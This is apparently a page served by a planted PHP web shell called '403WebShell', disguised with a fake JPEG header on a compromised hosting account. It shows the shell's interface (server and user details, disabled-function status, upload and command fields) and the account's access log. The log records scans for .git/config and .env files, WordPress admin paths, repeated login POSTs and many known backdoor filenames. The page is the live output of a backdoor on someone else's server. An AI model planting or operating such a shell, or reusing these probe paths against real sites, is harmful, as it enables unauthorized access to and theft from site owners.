ÿØÿà JPEG ÿþ; 403WebShell
403Webshell
Server IP : 68.65.120.201  /  Your IP : 216.73.216.139
Web Server : LiteSpeed
System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : taxhyuvu ( 2294)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/./././taxhyuvu/./access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/./././taxhyuvu/./access-logs/taxhelplines.com.pk
79.151.160.125 - - [05/Aug/2025:08:17:07 -0400] "GET /.git/config HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
89.47.249.61 - - [05/Aug/2025:08:32:29 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.166 Safari/537.36"
79.151.160.125 - - [05/Aug/2025:08:17:09 -0400] "GET /.git/config HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.130.60.195 - - [05/Aug/2025:08:26:24 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.203 - - [05/Aug/2025:08:44:08 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
165.22.95.3 - - [05/Aug/2025:08:50:31 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
165.22.95.3 - - [05/Aug/2025:08:50:32 -0400] "GET /favicon.ico HTTP/1.1" 301 795 "http://taxhelplines.com.pk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
216.244.66.203 - - [05/Aug/2025:08:44:08 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [05/Aug/2025:08:44:19 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
196.191.112.127 - - [05/Aug/2025:08:46:26 -0400] "GET /wp-login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
196.191.112.127 - - [05/Aug/2025:08:46:27 -0400] "GET /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
108.130.24.245 - - [05/Aug/2025:08:50:32 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Pandalytics/2.0 (https://domainsbot.com/pandalytics/)"
108.130.24.245 - - [05/Aug/2025:08:50:34 -0400] "GET / HTTP/1.1" 301 795 "-" "Pandalytics/2.0 (https://domainsbot.com/pandalytics/)"
52.45.92.83 - - [05/Aug/2025:08:53:49 -0400] "GET /sros?tax=Customs HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
18.235.158.19 - - [05/Aug/2025:08:55:33 -0400] "GET /caselaws?tax=Federal%20Excise HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.192.60.65 - - [05/Aug/2025:09:16:25 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
66.249.79.131 - - [05/Aug/2025:09:18:30 -0400] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt"
216.244.66.236 - - [05/Aug/2025:09:29:01 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [05/Aug/2025:09:30:10 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.79.132 - - [05/Aug/2025:09:18:30 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.236 - - [05/Aug/2025:09:29:00 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [05/Aug/2025:09:30:12 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
35.227.116.22 - - [05/Aug/2025:09:39:56 -0400] "HEAD /wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
216.244.66.236 - - [05/Aug/2025:10:13:59 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
2a06:98c0:3600::103 - - [05/Aug/2025:10:16:17 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [05/Aug/2025:10:16:32 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
216.244.66.203 - - [05/Aug/2025:10:16:45 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [05/Aug/2025:10:16:45 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
43.157.46.118 - - [05/Aug/2025:10:09:55 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2a06:98c0:3600::103 - - [05/Aug/2025:10:14:52 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [05/Aug/2025:10:17:32 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
20.191.45.212 - - [05/Aug/2025:10:34:01 -0400] "GET / HTTP/1.1" 301 795 "http://taxhelplines.com.pk/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
20.191.45.212 - - [05/Aug/2025:10:34:03 -0400] "GET /favicon.ico HTTP/1.1" 301 795 "http://taxhelplines.com.pk/favicon.ico" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
52.230.71.124 - - [05/Aug/2025:10:36:22 -0400] "GET /yanz.php HTTP/1.1" 301 795 "-" "-"
43.134.141.244 - - [05/Aug/2025:10:38:45 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
52.230.71.124 - - [05/Aug/2025:10:36:12 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:10:36:16 -0400] "GET /bless.php HTTP/1.1" 301 795 "-" "-"
66.249.74.37 - - [05/Aug/2025:10:51:24 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
140.206.235.118 - - [05/Aug/2025:10:58:20 -0400] "GET /viewjudgment?id=9426 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
216.244.66.203 - - [05/Aug/2025:11:11:53 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [05/Aug/2025:11:11:53 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.39.19.34 - - [05/Aug/2025:11:13:03 -0400] "GET / HTTP/1.0" 301 795 "http://taxhelplines.pk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
66.249.74.163 - - [05/Aug/2025:11:11:41 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
112.86.225.83 - - [05/Aug/2025:11:37:02 -0400] "GET / HTTP/1.1" 301 795 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
51.68.111.239 - - [05/Aug/2025:11:41:30 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.239 - - [05/Aug/2025:11:41:31 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
188.239.15.61 - - [05/Aug/2025:11:50:14 -0400] "GET /viewreport?id=1531 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0"
216.244.66.236 - - [05/Aug/2025:11:56:14 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [05/Aug/2025:11:56:14 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
188.239.46.50 - - [05/Aug/2025:11:57:17 -0400] "GET /viewjudgment?id=9426 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
52.167.144.187 - - [05/Aug/2025:12:00:24 -0400] "GET /viewreport?id=947 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
111.202.31.172 - - [05/Aug/2025:12:07:55 -0400] "GET /viewreport?id=1531 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
4.227.36.50 - - [05/Aug/2025:12:39:54 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.244.66.203 - - [05/Aug/2025:12:41:54 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
194.145.227.125 - - [05/Aug/2025:12:51:40 -0400] "GET /wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php HTTP/1.1" 301 795 "-" "ALittle Client"
52.167.144.25 - - [05/Aug/2025:12:44:59 -0400] "GET /viewreport?id=960 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.74.165 - - [05/Aug/2025:12:49:28 -0400] "GET /ads.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.227.36.32 - - [05/Aug/2025:13:15:30 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.74.164 - - [05/Aug/2025:13:18:31 -0400] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt"
216.244.66.236 - - [05/Aug/2025:13:28:17 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [05/Aug/2025:13:28:17 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.171.207.109 - - [05/Aug/2025:13:34:24 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.97 - - [05/Aug/2025:13:34:14 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.10 - - [05/Aug/2025:13:38:14 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.15 - - [05/Aug/2025:13:38:14 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.56 - - [05/Aug/2025:13:38:14 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.221.197.235 - - [05/Aug/2025:13:48:58 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
43.163.119.241 - - [05/Aug/2025:13:50:19 -0400] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:28 -0400] "GET //gdftps.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
52.167.144.23 - - [05/Aug/2025:13:51:25 -0400] "GET /viewreport?id=264 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
43.130.111.40 - - [05/Aug/2025:13:53:14 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.163.119.241 - - [05/Aug/2025:13:50:19 -0400] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:19 -0400] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:20 -0400] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:20 -0400] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:20 -0400] "GET / HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:23 -0400] "GET //doiconvs.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:25 -0400] "GET //moddofuns.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:27 -0400] "GET //inputs.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
43.163.119.241 - - [05/Aug/2025:13:50:28 -0400] "GET //memberfuns.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1"
162.221.197.235 - - [05/Aug/2025:13:51:06 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
103.107.198.246 - - [05/Aug/2025:13:51:55 -0400] "GET /administrator/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.107.198.246 - - [05/Aug/2025:13:52:44 -0400] "POST /user/login HTTP/1.1" 301 795 "http://taxhelplines.com.pk/user/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.107.198.246 - - [05/Aug/2025:13:54:28 -0400] "GET /administrator/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.107.198.246 - - [05/Aug/2025:13:55:08 -0400] "POST /user/login HTTP/1.1" 301 795 "http://taxhelplines.com.pk/user/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
207.46.13.64 - - [05/Aug/2025:13:59:21 -0400] "GET /viewreport?id=304 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
103.107.198.246 - - [05/Aug/2025:14:04:39 -0400] "POST /user/login HTTP/1.1" 301 795 "http://taxhelplines.com.pk/user/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
150.109.16.18 - - [05/Aug/2025:14:06:22 -0400] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
150.109.16.18 - - [05/Aug/2025:14:10:19 -0400] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
216.244.66.236 - - [05/Aug/2025:14:13:55 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [05/Aug/2025:14:13:55 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.107.198.246 - - [05/Aug/2025:14:03:20 -0400] "GET /administrator/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
150.109.16.18 - - [05/Aug/2025:14:06:24 -0400] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
150.109.16.18 - - [05/Aug/2025:14:07:20 -0400] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
150.109.16.18 - - [05/Aug/2025:14:10:16 -0400] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
150.109.16.18 - - [05/Aug/2025:14:10:17 -0400] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
52.230.70.120 - - [05/Aug/2025:14:21:06 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
216.244.66.203 - - [05/Aug/2025:14:56:01 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [05/Aug/2025:14:59:34 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.236 - - [05/Aug/2025:14:59:34 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [05/Aug/2025:14:56:01 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
52.167.144.235 - - [05/Aug/2025:14:57:54 -0400] "GET /viewreport?id=77 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
196.251.84.117 - - [05/Aug/2025:15:18:19 -0400] "GET /.env HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
4.227.36.56 - - [05/Aug/2025:15:24:56 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.108 - - [05/Aug/2025:15:25:07 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.58 - - [05/Aug/2025:15:25:11 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.20 - - [05/Aug/2025:15:25:16 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.32 - - [05/Aug/2025:15:24:54 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.87 - - [05/Aug/2025:15:25:06 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.15 - - [05/Aug/2025:15:25:07 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.5 - - [05/Aug/2025:15:28:10 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
52.167.144.212 - - [05/Aug/2025:15:39:45 -0400] "GET /viewreport?id=665 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.244.66.203 - - [05/Aug/2025:15:39:50 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
51.222.253.14 - - [05/Aug/2025:15:28:08 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.236 - - [05/Aug/2025:15:44:15 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
4.197.236.174 - - [05/Aug/2025:15:47:19 -0400] "GET /t.php7 HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:20 -0400] "GET /about.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:21 -0400] "GET /bless.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:22 -0400] "GET /goat1.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:23 -0400] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:29 -0400] "GET /berlin.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:31 -0400] "GET /file.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:36 -0400] "GET /ben.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:36 -0400] "GET /chosen.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:37 -0400] "GET /byp.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:16 -0400] "GET /adminer.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:18 -0400] "GET /filename.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:18 -0400] "GET /wp-content/themes/twentytwentythree/styles/about.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:19 -0400] "GET /firewall.php7 HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:20 -0400] "GET /ar.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:20 -0400] "GET /wp-admin/images/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:24 -0400] "GET /av.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:24 -0400] "GET /ay.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:25 -0400] "GET /jp.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:26 -0400] "GET /adminfuns.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:26 -0400] "GET /wp-includes/0.php HTTP/1.1" 301 795 "-" "-"
